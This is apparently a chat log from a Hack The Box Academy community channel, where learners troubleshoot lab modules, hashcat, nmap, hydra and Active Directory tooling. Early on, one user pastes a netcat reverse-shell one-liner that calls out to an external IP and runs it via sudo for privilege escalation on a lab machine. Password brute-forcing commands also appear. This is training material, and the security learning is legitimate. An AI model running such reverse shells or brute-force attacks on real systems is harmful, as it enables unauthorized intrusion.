#modules

Yeah

Two minutes, I'm close to setting it up again

I don't need to do LinEnum every time do I?

It doesn't do anything except advise what's available

No, you don't need to do linenum each time

nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.223 4321 >/tmp/f' | tee -a monitor.sh
< /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.223 4321 >/tmp/f' | tee -a monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.223 4321 >/tmp/f
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo monitor.sh
sudo monitor.sh
[sudo] password for nibbler:

😭

Bro

Hey, what's linenum? Is that an nmap NSE script or is it a bash script? I use linpeas

you know you gotta use the full path to the file tho yeah? what are you trying to do privesc?

Use the full path

Aaah okay

LinEnum is a tool like linpeas

Which is better? Is one used more than the other?

Neither is better than the other

Alright. I'll keep using linpeas then 🙂

They both can spit out a bunch of random stuff that's rabbit holes

IT WORKED 😭 😭 😭

I still like to drop it using my python http server if I can. I remember when the module used to be called SimpleHTTPServer. The first time I tried it after the update I was confused why I couldn't start a server!

It's http.server now 🙂

i'VE BEEN STUCK FOR A WEEK

Yeah bro! Check them paths next time congrats.

Learn to try+fail fast repeatedly until it works.

I swear it wasn't doing it before

I'm gonna type the shit outta those paths!

Yeah man. If you're looking for a tool you can use locate, like locate sh. It would then output /usr/bin/sh 👍

oooooh

So if I want a complete file path I can use locate?

To find the file path quickly

and pwd if I'm already there?

Best to type the full path anyway

You can also use it to find wordlists. For instance, you could do the following.
locate wordlist| grep pass
To find only password wordlists that mention wordlist and password in the file name.
Or more specifically:
locate ftp| grep pass
To look for an ftp password wordlist.

Eh, when available I'll use the cp command to copy a random file to my current directory and then use the file server there. I do that with linpeas rather than opening the server in the linpeas directory.

I don't do that with bins though.

Noted!

I STILL don't fully understand grep

Grep just finds a string in something

Grep is simple, and super useful! What it does is cut down output and only displays lines which contain your search string!

Cat and grep are bff's. Especially when you pass the output of cmds into a text file.

You don't need to cat to grep btw

You can grep string wordlist.txt

Yo??? 😂

How did I never know this.

Hi Guys, Im working my way through the SOC pathway before I take the exam in a few months time, I understand HTB is going through some issues with the target boxes atm but ive been a Silver member for over a two months now and in all that time the target boxes are completely sluggish and unreliable, my question is, it is always like this or did I just join at a bad time?

Just joined at a bad time

Also in-general use the tcp download

👍

any idea when it will be fix ? I haven't found any communication on the issue except for the yellow thing on the site

People have been complaining in here for weeks. Seems like it's just an issue with their providers. Not their fault but I'm sure it will be mitigated soon

thanks @fathom pendant I just dont want to do all the modules and then have to do an exam on a slow box

👍

Watching the news rn saying Chinese hackers are about to "wreak havok" on us 😮 crazy they're finally talking about such issues.

(US),

pick a vpn server closest to you, if you're in asia and oceania then you'll have to deal with the ping

At least for the pwnbox

The vpn servers are only us and eu

Yeah the closest to me is the UK server but still the same lag or RDP failure connecting to the pwnbox

use a tcp vpn

same for the lag, can't do the module on windows command line skill assessment

You're using the in-browser vm yeah?

Yes indeed

If so: don't use download/run the vpn pack

Cheers, I will give that a shot, thank you

It will cause issues

The vpn pack is ONLY for use in your own vm

Running both the vpn and pwnbox will cause issues

Ah ok, yeah I never downloaded it, I have always been using RDP via browser

does the lag the same on pwnbox and vpn+vm ?

I've had relatively ok success with my own vm

maybe i'll try that thanks

But also tcp download is 1000x better than the udp

Im stuck now until the issues is fixed, impossible to do log analysis on a Windows box with the lag, fingers crossed they get the issue sorted

UDP so unreliable 🙂 don't use it if you don't have to!

yep the windows one are the worst

can't write a whole command before the thing crash

💯

Gotta hack faster man

and now I can't log on user5, don't know why

I'm so relieved to be moving forward 😢

Glad

Skill issue

Does the integrated terminal ever work for anybody?

I'm doing a service scan on a single port using nmap and for some reason it's taking forever (and also not giving any actual service information...)

tomcat ajp

Depending on what module you're on, a firewall might be blocking the scan or you could try resetting your instance

I've tried resetting the instance, was having the issue yesterday too but thought it might've been down to server issues

gonna try getting a new VPN key

Yeah it could aslo be that, you on Pwnbox or your own machine?

Own machine

A new key is a good idea, also make sure you get a TCP one

^^

Well that helped with the speed but now the port says Filtered when it absolutely shouldn't for this box.
Guess I'll check firewall

Nice, what module you on by the way?

Anyone who can help me with https://academy.hackthebox.com/module/33/section/216 🤔

I don't get what I'm supposed to enter as a flag.

I've tried the users, the passwords, the injection itself, etc

just going through some of the starting point ones quickly, doing Sequel and it's just returning "mysql?" as the service, which is definitely not the answer

Which I think is what nmap returns when it can tell a port is open and guesses it based on the standard usage of said port.

Nvm

Well pinging it shows a very uhhh...
Unstable connection

Just looking through to see if I've done it, what question is it?

Task 2, what community-developed MySQL is the target running

Ok and what command are you running?

Just doing 'nmap -sV -p3306' atm.
And the scan takes forever and just returns either "filtered" or "open and mysql?"

I can finding it using mysql -V {ip}

but I wanna know why nmap being fucky

Lemme try and spin it up quick

Giving me mixed results too

Weird, I can work around it at least, I think.

Yeah just try to connect to the mysql server for now I guess

😦

I am not able to use hascat on my local VM due error * Device #1: Not enough allocatable device memory for this attack. Tried using pwnbox, but alas 😦 .

don't use hashcat in a vm, run it in your host

For realsies? I've had trouble with it on pwnbox before too.

I wish to have a rainbow tables on a big ass external SSD one day. Shit I probably could get a decent one going rn.

hashcat is designed to use gpus, it can't get gpu access in a vm, so it will fallback to using cpu

Tunnel vision never occured that hashcat can be used on windows too

Does this apply to pwnbox? Not using a VM on the local machine?

pwnbox is a vm

Yeah figured I wasn't sure if it was perhaps using the cloud with access to a GPU.

should've been mentioned in the module imo

Talking about using it from the browser not using the image locally.

yeah the cloud instance is also a vm

Okay 👍 cause with another service of which I'm using the cloud I get access to a GPU. I was wondering if pwnbox cloud instance allowed that to wonder if the situation was diff with spawning or running the VM.

However it would work if you weren't using a VM and just booted into pwnbox!

Which, am I weird for doing that? I generally don't make VMs for things like pwnbox. I'll just throw it on a USB and boot from it.

I just don't like VMs very much 🤷‍♀️

then the whole OS will be bottlenecked by the USB speed

True, but some drives have decent rw speeds. I have some good quality drives with OS on them that run well. You could also use an SSD too and get even better speeds.

The USB boot still utilizes the computers hardware. The only bottleneck is rw speeds really. It's not that big of a deal.

rainbow tables are, for the most part, relics of the past 🙂

Haha I guess you're right. That thought is stuck from the past 😂.
What's the best practice now, just use hashcat?

yeah pretty much

it's the man himself

🙂

Haha I just read the about me or whatever it's called here.
Well chicken man, good work 😂.

haha

i have good timing on hashcat related issues apparently

It's like Beetlejuice

Someone mentions a problem with hashcat 3 times, the chicken man appears!

it sure does feel that way sometimes 🙂

Good on you though, good dev.

I am having hard time in Password attack module , F:\HTB CPTS\hashcat-6.2.6>hashcat.exe --force Password-Attacks\password.list -r Password-Attacks\custom.rule --stdout > mut.txt cant create mutated list. Can I dm someone for this module?

Chick3nman about to say for the 9827261th time not to use --force

hahaha

I will just search every hashcat msg on the channel

that looks like two failures to do the same thing

pwnbox resources change or something?

or both being done in local vms maybe?

Don't use --force

that really shouldn't be a heavy process, minimum allocation is tiny

well, relatively tiny, somewhere north of 256mb per device

I see everyone had hard time with this module

yeah, it's been an ongoing thing

Most of the issues people have is impatience

trying to run heavy tools in extremely resource constrained environments doesn't play out so well

The problem I pointed out I was having is I wasn't sure if I should be using a more refined wordlist or not.

I wasn't sure if I should wait a while or use a different wordlist that might get it in the first few minutes. Just a matter of efficiency moving through the modules I was upset at.

And to be honest, what did I learn there? You just have to find the wordlist closest to what you're looking to do.

The password is probably in rockyou, yeah. But do you want to wait that long?

to be fair, that sets up some very unrealistic expectations and precedent for real world usage

I don't even remember which wordlist that happened to be.

You reposting isn't gonna get it answered faster

Tried doing that still couldnt create wordlist

Yeah exactly. In a real world scenario you would probably create your own wordlist based off of osint and other potentially known passwords.

Or you maybe would just go to Phish it in an engagement.

I would bet rockyou isn't even close to a silver bullet. Especially with a decent password policy.

"Still couldn't create" is vague

Lmk what you think.

Is the server linux

Yes, but also no. It's perhaps a little less involved than you might think, people make terrible passwords and custom wordlists are actually not nearly as necessary as you might think starting out. They can be powerful as you work on tougher and tougher things, but they are generally not super necessary to clean up low hanging fruit.

the unrealistic part is the precedent set by the sizing and times

a clean copy of rockyou has like 14.3 million lines in it, of which the vast majority are acceptable for most attacks and will get processed

If you run just the command without the redirect to the text file, what happens

that sounds big when you have a CPU on a VM

but that's incredibly tiny in the real world

Its likely that it's erroring out due to not finding the dll for your gpu

Since you have it on an external drive

I've rarely had hashcat issues in my vm, but I think I'm running like an i7 or something

yeah, it's almost certainly going to be related to the minimum memory allocations against the exposed device

1gb of RAM for the VM is too small 🙂

Alright. So pretty much why not try with rockyou? It's just more viable when you're able to get the max processing of the seemingly large file in the real world than it is in these scenarios?

rockyou is old, like really really old, and tiny

Thanks for the insight :p

4-8 is the minimum for most os

it's very useful for CTFs because everyone uses it as a source

Yeah I know of a few others, upwards of 20GB

but in the real world, it's pretty useless

bigger != better, to be clear

It's been a while so my memory on the names are a little fuzzy.

at least, in terms of wordlists

HTB has a rule if it's to be bruteforced, it needs to be in rockyou

Like a dark list or some shit

right, as with most CTFs and learning platforms

I think thats useful for keeping the modules "doable"

Trying to see what it outputs and resolve it.

but it sets some interesting expectations for users who miss that it's unrealistic

Yeah. imo a good password dictionary would be one that contains passwords gathered from similar environments. I imagine these wordlists tailored specifically for enterprise or industrial. Wordlists confusing those heavily would be best to use when attacking the accompanying type of environment.

it's both "large and too slow" and "far too small" at the same time

Potentially from leaks or industry standards such as dictionaries generated to current policies.

right, but good password dicts don't necessarily need to contain passwords at all

I think the more realistic part of the password attack modules is the hint for kira, you're given that she usually uses x password, or derivatives of it

because good attacks probably shouldn't rely solely on the dictionary

Mask attacks go brrrr

rules and other forms of mutation/construction are significantly more important and the dictionary you use should be tuned to work with your rules, not necessarily tuned to work on its own

True that. As I mentioned earlier there's other routes that you don't necessarily need a dictionary for, like phishing. Or MiTM.

the lack of GPU or other specialized hardware in labs leads to a huge blind spot in the learning around how to actually utilize available hardware resources

Like the structure of passwords? The pw rules & policy?

hashcat rules

https://hashcat.net/wiki/doku.php?id=rule_based_attack

It sure does

it's important to understand that GPUs are not just big fancy CPUs

and you need to make a concious effort to actually use them to their full potential

just running a wordlist will cap your speed at tiny fractions of what your hardware may actually be capable of

I tried not using --force , and not redirecting output to the file. It ends without generating any words with error Please specify the hash-mode with -m [hash-mode].

Where can I learn how they are truly utilized? I love finding information such as this. Currently working towards going into the field. I've been self taught for a very long time, but now I'm in school as well as working for certs cause I can finally afford it all!

Is this something I can generally only understand from on-hand experience in the industry?

Yea I believe you need to put -m 0 or something

something else is wrong here

--stdout should negate the need to specify a mode

👍 I gotcha

i wish i had a good "go look here for advanced info" link to give you but there's no single source yet

Question: If one of the module's targets NEVER spawn (it's been 1+ week now) and I can't complete the final skills assessment due to this damn thing being stuck at "spawning." where do I open a ticket with support to fix their VM? This is beyond the issue that affected everyone yesterday. This Windows VM target has been broken for over a week. Prior to that, when it was working for the 2 days I could use it, it was taking 30-60 minutes to spawn.

the hashcat wiki has some of this and there are scattered training materials and resources from third parties, like what you've found in here

Green bubble on the site

If you don't see it: disable adblock

Thank you

but finding a platform to distribute this and related info through is still an ongoing task for me and it's not gotten easier :/

with --stdout I get zero output . some info download hashcat binary from site, using .exe in cmd.

So yes, it's an industry based experience thing?

They've been having issues with upstream providers recently, so don't expect more than a "we're working on it"

it's a "i understand the deep inner workings of the tool since i work on it" thing, the "industry experience" seems to be for people to do labs like this then run rockyou.txt in real world engagements

I understand. Many of people are probably in the same boat. Unfortunately some people even treat such information like it should be a proprietary secret. I believe working together is key to moving forward.

Agreed

information sharing is vital to keeping people aware of what is both possible and also what they should be doing

running rockyou and calling it good is not the standard of quality that pentesters and red teamers and such should be throwing at engagements imo

but everyone has their own opinions on that stuff 🙂

Yeah this is not what I'm looking to do. I want to do have the most effect given the current best available tools. I only know what I've taught myself. Which is a lot, but the reality is the depth of technology is insanely deep. Always more to learn.

Yeah, and that's often the argument a lot of people make for why they don't dig deeper on this stuff

you need to know 5000 other tools, why dig into hashcat or similar beyond the quick and easy stuff

The information being a available is also what can keep our devices as upmost secure as possible. Unfortunately the bad guys don't like to share their secrets though but that's what RT is for.

haha, if i had a nickle for every time I saw wildly out of date security practices where the information on how to do it better has been available for 2+ decades

I agree. Efficiency is key and we have discussed how rockyou is no silver bullet. It's not efficient.

chick3nman Can I dm you?

Yeah, some devs just don't care. How many vulnerable sites are there out there? Vulnerability in your plugin? Well you could update! But nah.

we have probably strayed a bit off topic for this channel so might be good to get back to module talk

sure, or ask here

either one works, might be good for others if they have the same question you do

And I think some corps just deploy shit tons of infrastructure and then forget about some of it in all of the chaos.

this is extremely common

Agreed sorry lol thanks for the insight though buddy. I don't get to talk to many people about such a subject 🙂

Yup let me frame proper message

I'm always down to deep dive this stuff, just probably in a different channel is all 🙂

I have a decent idea of what's up. There's always more 🙂 cyberspace is vast my friend.

how does the caching for hashcat actually work? it builds a new cache for every wordlist, but the cache is not loaded into the memory

oh, dict caching?

yeah

that's... perhaps poor terminology, its only caching statistical information, not chunks of the dict itself

Perhaps your jsp is just wrong

yes

ah so the actual data is still loaded from the wordlist itself? I guess the disk read speed is important then

yes, to some degree

though other things are often the bottleneck if you're pulling from a semi-modern SSD

I see

Module - Password Attacks
Section - Password Mutations
Trying command hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list to generate mutated list
Tried above command without --force on windows machine using hashcat.exe on both cmd and powershell
F:\HTB CPTS\hashcat-6.2.6>hashcat.exe password.txt -r custom.rule --stdout - got no output
withou --stdout its asking to specify a mode.

what does hashcat.exe -I report?

It gives CPU GPU info

ahh

I think not its fetched from htb

Oh is it because CUDA SDK Toolkit not installed or incorrectly installed 😦

try hashcat.exe -a 0 password.txt -r custom.rule --stdout -D 2 -d 1

it shouldn't be, my guess is that it's the iGPU runtime being finnicky

This works

ahh yeah ok

-a 0 is the attack mode -d backend device -D opencl-device-types ( incase anyone stumbles upon this)

All labs are down?

The core issue here is the runtime for that CPU/iGPU is broken or otherwise having issues

this is unfortunately not uncommon and can be difficult to diagnose

bypassing the problematic runtime/device and selecting a "known good" device like the Nvidia card obviously works

but it sucks that the state of the iGPU/CPU runtimes is so inconsistent

does hashcat try to use both at the same time?

in --stdout mode, we actually only barely need a runtime at all

we choose first available, defaulting to CPU if possible

if no CPU device is present, we will default to GPU

Why did we select opencl-device-type 2 that is intel , while selecting backend device 1 which is nvidia gpu?

at which point, it will try to use both

-D 2 was to tell it that it's ok to use GPUs, hashcat's default behavior with --stdout is to try and use CPUs first, so if a CPU device was present, it would have behaved as if you had set -D 1 instead

if no CPU device is present, -D is unnecessary

and -d 1 would have been enough, just selecting the known good device

Thanks chick3nman , I don't think I could have resolved this issue without your help.

no worries, it's certainly a hard one to spot

I am new and trying to work through the first lab. i use sudo nmap -sV {IP address} to find the port i want to use but it does not give me a port number like it hsould it just says 1000scanned ports on ip address are in ignored states

what about in standard attack mode? does it use all the gpus available

yes, typically

we can't really tell the difference between devices

the runtimes will report iGPUs the same as dedicated GPUs

try -p- to scan all ports*

some logic to skip iGPUs if possible is something I've been considering for a while

but it's kinda tough and imprecise

Does rockyou work in real engagement scenarios?

it can

at the end of the day, it's still 14 or so million real passwords, so it's definitely possible to use it to crack stuff

but its also from 2009, and it's only 14 million passwords

somewhat similar to running a list like "top 1 million password" or something of that sort

yes, you can use that to crack stuff, but it's not going to crack anything but the easiest/simplest passwords

still dont work

I think this may be the reason author's more focus is on password spraying in the modules.

Offline attacks and Online attacks are similar, but distinctly different

online attacks and spraying and such really hasn't changed all that much, aside from some more rate limiting and mitigations at play

but offline attacks have changed a LOT

we have single GPUs capable of hundreds of billions of guesses per second and on the flip side, extremely secure algorithms that can reduce those cards to 1 guess per second

that's not to say one is any more important than the other, especially for learning

but they are pretty different from eachother

So you're saying "I'm a pentester" is a good excuse to upgrade my graphics card?

Eyooo emergenci maintenance? What hallened someone fucked up.the bgp config?

I havnt been able to reach any of the hosts all day, on both Academy and HTB

Perhaps 🙂

Reach out to support

I wish, things should be working atm

I switched to the VIP VPN, it helped a bit

I did too, I swicthed to US Vip but didnt help

Tried variations of both the EU and US ones

I did email them, I just got an auto response

which email?

should be via the chat bubble in the platform or customerops@hackthebox.com

customerops@hackthebox.com

I have also messaged in the chat bubble

Alright, then please wait for a response

You only need to do one

Not much else i can do

Now its working again

I have a question about attacking common applications-attacking gitlab. Borh of the suggested tool for user enumerations doesnt work in pwnbox is there any suggestion how to move forward?

Does everyone have problems with targets?

I started having issues last night, have not been able to connect to targets all day today

Same problems (

Things for the most part are up and running for me, RDP has been uncooperative as I just get a black screen. I am happy that I can perform most of the exercises now tho

Press enter, black screen is intended

Oh im all set then. thx

I got pinged

Hey can someone help me or do with me command injection the Skills Assessment part?

there was a rule break but someone silently cleaned up the issue

ah great

thanks

the username was case sensitive btw

Guys, can someone help troubleshoot bloodhound?
I can't seem to upload data and I keep seeing in the console: "The client is unauthorized due to authentication failure".
Tried deleting the databases and restarting. Dunno what's going on here because I managed to authetnicate with the credentials I created.

EDIT:: Managed to solve it. For anyone facing the problem of bloodhound being stuck at 0%, the app simply doesn't have a way to tell you the data is incompatible. SharpHound 2.x is only compatible with Bloodhound 5.x.
Source here: https://github.com/BloodHoundAD/BloodHound/issues/700

Hi everyone, I'm on the Digital Forensics module - Practical section. Any ideas on how I can decode this? I tried getting everything in-between the double quotes and decoding that using base64 -d, but I'm getting gibberish

Base64 -d is good, but check the last 2 lines what happens after that

Where can igo for the vpn issues for hackthebox machines

you contact support and then wait

keeping in mind the wait can be loooong

Ok

the php web shell part is broken followed the entire process from start to finish then its 404

Hint?

search here, there are a lot of discussion about that module ,really just Use the search bar in Discord

visited every post. but nothing specific. I get the error error while

I also can’t figure out where to insert payload into to or from

Hello

I have put all 3 and still

What is the latest Python version that is installed on the target?

Does anyone have issues with pivoting skills assessment? it's so slow I can't interact with the RDP session it's so laggy

I have put all the versions and still

Dude, if this is the case, you may want to review all the content again. Most people ask here once they've found the injection point and are having issues with their payloads. But if your problem is that you haven't identified where the flaw is, the best thing for you would be to go back and re-read the material, as it's a significant skill issue.

locate python and look in that directory

not found

which python

I get nothing

I have put everything right but still

which python3 and see if that gives you anything

Which question?

Also one of those looks correct

Make sure you don't have any weird spaces before or after

I made sure bro and nothing :(*

Module/Section?

LINUX PRIVILEGE ESCALATION/Linux Services & Internals Enumeration

This means you had the answer in front of you

^

Is it expecting it without the python, just version?

Or with

Just version

I can see there's some compression/decompression going on. Can you give me a nudge on how I can go about deciphering this command?

Just the version

Oh

I read that I have to put it in x.xx

but still

Oh it doesn't need the sub version?

I did it and still

¯_(ツ)_/¯

Refresh the page and try submitting it again

Sometimes it's that dumb

It is really something easy but the format in which you want to apply it is strange.

Not really

3.11.3 or w/e

If you are on windows you can probably just replace the iex call with a print. On Linux I’d try doing base64 -d and pipe the result in a new file and then try to gunzip it

I already did it broth

does not work

Try just 3.11?

YESS

I think default python location is in /usr/bin/

DAMN

Dude chill

thanks broth

I'm trying to check all bases

Incredible how you get frustrated in these details HAHA

which module and section is this

??

why are you ?? me

@thorn urchin

Im asking a question

Have fun

Nah not helping, I asked a basic question and got hit with ?? nvm

https://tenor.com/view/peace-out-gif-22295199

I was gunna open it up and verify the answer format

Sorry, I thought you meant someone else.

Sorry broth

Maybe they updated it because I read somewhere else that they also put x.xx

yup its just X.XX

I just guessed it before the target spawned lul

Wouldn't python3 -V show?

it didn't accept it and I tried everything and in the end it worked 3.11

Yeah

Thanks!! 🙂

Hello, I'm currently doing the practical Digital Forensics Scenario, and I've been stuck on this question for two days now.
Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs\%5C%5C.%5CC%3A\$Extend\$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.exe

Can someone please give me some clue so I can figure it out? Currently, I've tried using the TimelineExplorer, and traced the .zip file, but still haven't found anything.

Local Testing - Validation Logic Disparity
Doing the Logic Bugs, specifically the Local Testing section - and it states that I have to book an exam in the future which was not available -- I've done so, but not sure where I should see the flag

Is this what it should look like? I'm looking through it but can't find the Powersploit tool, so I'm not sure if I'm even looking at the right thing.

Ah, it cannot be done with the local docker instance it seems :) got it

Uh, tbh I was able to guess the Powersploit tool by the answer format given. But what you see there is the Powershell code from the original base64 string

im working on Information Gathering - Web Edition - Virtual Hosts and im tryuing to fuzz the target, could please some one tell me whats wrong with my command:
cat /usr/share/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://10.129.190.240 -H "HOST: ${vhost}.inlanefreight.htb" | grep "Content-Length: 120 ";done

But the level of reverse engineering you are doing there seems to be too much for what the module taught you. The answer should be easier to find I would think

is there any recommended user list and/or pw list for cracking winrm?

whatever lists the module provides

Anybody able to explain this monstrosity of a question?
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

under resources there is a file(?) called pw-attacks, i guess that works for pw part but what about users? theres no mention but a specific list, just trying to remain effeciant

Hmm I thought I was in the right track based on the question but I guess not

I mean maybe you are

It just appears harders to figure out than other tasks

Maybe I’ll get back to that question tomorrow and redo it and see how it’s supposed to be done. I’ve seen the question pop up a few times now

hey sorry to bug you; but were you able to get sqlplus installed on your parrot? if you're still having issues mind dming me regarding it? gonna pass it off to the parrot guys to see if it's been resolved; I just checked pwnbox and the packages referenced by the install script do exist there

hello everyone
is it okay for me to struggle with the linux CLI and have to google every single command?
I just finished the academy lesson for linux fundamentals but I still struggle.
is it okay to continue with other modules or should I do something else?

look up bashcrawl; it's a nifty little command line game which is done directly in your terminal

using nothing but your imagination and basic bash commands

@fathom pendant , a question...
"Information Gathering-Web Edition" I'm examining the Content-Length header to look for any differences. so i found a pattern "ex:.Content-Length: 10918. my question is: There's any command to show only numbers different than 10918?

-fc is a negative filter; meaning that any number you put there will be ignored

if using like ffuf

thank you so much

ffuf has -{f/m}n
f is the filter out
m is the match

For future reference, in the Introduction to Bash Scripting module it's highly recommended to pay close attention to the examples given throughout the module specially because in the Flow Control - Loops section the way the length is calculated affects the value you need, since it's used as a salt in decrypting the flag.

Also, remember that

echo $var | wc -c
echo ${#var}
printf "%q" "$var" | wc -c

Are not the same and they will output three different results, and it's important to know why.
Do not follow ChatGPT or StackOverflow suggestions on how to count the length of a variable in bash, in this specific case, all the knowledge you need is in the module.

Remember, bash is like a hammer and everything is a nail, but fail to understand why and how the code works and the only thing you'll be hitting is your thumb.

hey folks on active directory enumeration and attacks rdpd into the windows box trying to run the Get-NetLocalGroupMember cmdlet but it says its not there not the first cmdlet not found error in the module anyone know if this is normal and what the workaround is

import-module ActiveDirectory

import-module C:\tools\powerview.ps1

so its apart of powerview thought it was a builtin windows cmdlet

might be part of ActiveDirectory

but you still need to import it

you can call import-module ActiveDirectory from anywhere

active directory import didnt work but powerview did strange since its listed as included by microsoft

for newer windows server you might need to use RSAT

AD worked, you just likely didn't notice it load

i ran cmdlet after import it errored out saying cmdlet not found

cmdlet isn't a command

lol

Cmdlets are native PowerShell commands, not stand-alone executables. Cmdlets are collected into PowerShell modules that can be loaded on demand. Cmdlets can be written in any compiled . NET language or in the PowerShell scripting language itself.

PS C:\Tools\ADRecon> import-module ActiveDirectory
PS C:\Tools\ADRecon> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
Get-NetLocalGroupMember : The term 'Get-NetLocalGroupMember' is not recognized as the
name of a cmdlet, function, script file, or operable program. Check the spelling of
the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1

huh

guess it isn't part of AD

who knew ¯_(ツ)_/¯

why arent there any general chats anymore?

There's always been a gen chat, you just need to link your account to see it

#welcome

ah

also sanity check please for monitored dont wanna give the possible answer here but someone lmk if I can dm so I can show what im doing because ive been at this sql injection part for more than an hour and I know what I am doing is correct with that parameters that I am specifying I have a slight feeling this box is trolling me and deciding not to work

You are in the Academy channel.
Better ask in the channel #boxes

ok

On the footprinting medium lab do we need to set up a pivot to the network found?

nope

pivoting is not required for footprinting

I know I'm supposed to ||RDP into the machine|| but it's not working. I can't even ||ping the IP that I found.||

wdym ip that you found?

you only need access to the IP given

:) rdp to the IP given

Tried that to but it doesnt work

what's the first letter of the user you're trying

a

also wdym it doesn't work

if you're using xfreerdp you may need to wrap the password in single quotes

Tried that to

that's weird that it's asking about TGT

Hi , I wanna ask a question in Windows Event Logs & Finding Evil Skills Assessment ,The question is:
' By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack' (.exe file)

Now, I will briefly explain what my approach is. I have:

1. Opened the folder in the 'Logs' directory, then the .evtx file
2. Filter the log by event ID 7
   (I have already modified the sysmonconfig-export.xml to ensure that nothing is excluded)

Unfortunately, I can't find any useful information.
Can you please give me a hand?

it's working fine for me

Worked for me just now too. It's weird the command popped up in my history as if I tried it before and it didn't work but it did today.

Stuck on
Attacking Common Applicaions: Attacking Applications Connecting to Services
Question: What credentials were found for the local database instance while debugging the octopus_checker binary?

Done gdb ./octopus_checker
and then set the breakpoint at the following as below
0x0000000000001607 <+433>: call 0x11b0 <SQLDriverConnect@plt>
gdb-peda$ b *0x11b0

When I hit enter it say cannot set breakpoint at 0x11b0 access denied

What I am doing wrong?

weird: also have you checked the other available service for something important maybe

Found an "important" file. Trying to see where that takes me

hey any completed the intro to assembly langauge I am stuck on Procedures unsure which stack to grab or how to grab it i have been running the file.s making break points and tried running with c for continue then tried si and ni but having issues what stack i am suppose to be grabbing or how to grab it?? thank you

anybody

that's step 2 basically; it's a shame that UAC doesn't allow pasting

but after that it's shrimple

ahh good ole password reuse

||I ended up relogging with that password||

lol

btw you can find that file without touching SMB

How?

well, you're rdp in

you have access to all the files and shares that he has access to

Oh yea thats how I found it

I thought you meant something else nvm

i just meant smbclient

ooh gotcha

which allows you to get the file

the hard lab trips the most people up imo

and tbh: the only thing that tripped you up was rdp being dumb

This one got me at first but once it clicked I started to make steady progress

yeah; GUI for mssql SUCKS

I think last night when I first tried it the machine turned off without me noticing

but if you don't know any mssql query commands

yeah that's just odd

Yeah it was kinda awkward to execute a search from the GUI.

I'm so close yet so far

i mean good thing it's not that far from the bottom of the visual list if you're doing it without using a query

wow I am an idiot

Finally got it

Right infront of my face

yep

it's easy to look right over

i will say for the hard one: read the engagement carefully and figure out which service may be available through that

Ok so I thought I had it but I hit another wal

wall*

Im using the credentials of the "important" user but with the correct username. (if you catch my drift)

?

what are you trying to do?

if you're trying to auth with mssqlclient.py then you're gonna be 1: SOL because it's only internal

login to the server so I can search for the flag easier

you can run SQLCMD from an rdp session

but yeah you're not gonna be able to externally connect to it

also: the GUI does have a way for you to get a query

what do you mean SQLCMD

i mean the windows command line

thats what Im looking for

sqlcmd

but also right clicking and just overall clicking around can help you figure it out

:P don't be afraid to just click around and find out

literally a button in the GUI ribbon "new query"

Learned how to make sqlcmd work

That was a fun lab

yep

Hard lab is SUPER straightforward once you find the foothold

Followed as per module but something strange is going on..!
Can anyone give a nudge to it???

your breakpoint might be at a different memory address

it's gonna be different per machine

and per run instance

different bits of memory addresses will be free differently

Oh mine

So should I test everything each time?? 🥲

you should determine where the breakpoint should be based off of where gdb prints things

i'd think the module tells you how to do so

but ig not

literally right under where you have question marked: Cannot access memory at address 0x11b0

Ok let me try a bit more

hey is something wrong with the target instance
it's literally in loop of Target is spawning... from past 20 mins

changed the section twice and all are responding in the same manner

the PW mutations module... its taking AGES to crack the pw

I don't wanna spoil it for you but it was intentional for the cracking to take a while for the mutations part; we all went through it, should take like 30-40 min

the module alone had me cursing a lot lol

i wonder if this is something i'll do during CPTS exam, that would suck lol

probably, best be prepared for the worst!

crap.. lol your probably right.. its still going too. 6247 tries in 1:03h

that's too long

something you are doing is not right.

ok lets see, i got the zip file from resources like it asked. next created a mutated pw list using hashcat like so: "hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list"

then i used hydra to brute force like this: "hydra -L sam.list -P mut_password.list ssh://<target>"

i might have goofed on "sam.list" its a file only containing the name "sam" .. I couldnt use just do "-L sam" said it was missing a file

@dire abyss with hashcat you need to specify a mode.

https://hashcat.net/wiki/doku.php?id=example_hashes

also in the future maybe you shouldn't use options like --force because it hides the error info from you. Much of the time it is good to see what is causing an error.

if this is the one i think it is

good to know.. by mode do you mean rule?

it's because you are attacking the wrong service

no I mean Hash-Mode

the question in the module specifically ask to for SSH

not needed here

ah, in that case im not sure

there's one that comes up in here quite often that has FTP or something else exposed that's much faster to attack

dont target ssh it times out theres another service.

ssh resets don't happen as fast as ftp

let me try FTP

Also i think -T 100 makes it use 100 threads

was i off on the sam.list part?

i dont remember that far back, you're on your own with the question on that lol.

anyone ?

this is refferring to speed?

also running hydra against FTP results are super fast but doesnt tell me whether a pw is good or not

The more I dive into the AD enum and attacks module the more I ask why is Microsoft implementing all these things? Why not just keep things simple? xD

actually get hit with a few logging errors

yes the more threads you use the more processing power you use.

sorry the logging errors came from crackmapexec not hyrda when i tried against FTP

yeah use hydra not cme

is that just preference in tools or is hydra actually better?

accidently terminated my pwnbox so i'll have to try again tomorrow, however as a question with the "tutorial"

when i attempted connecting to the ip given, it said that the server took too long, what does on do in a situation like that? is there anything i missed?

if one doesn't work may as well use the one that does

that's not normal, and you can click on the + icon next to the time to extend the time

okay so you won't get far with the commandline, you can decode/decompress the initial command like you did and when you do you see there is another base64 decoded command in there that is also xor'd with the value "35", if you put this in cyberchef you can see bytecode (so not really readable) and the URL it tries to talk to. But this is just the setup script for a beacon, that part does not include which powershell script was run.

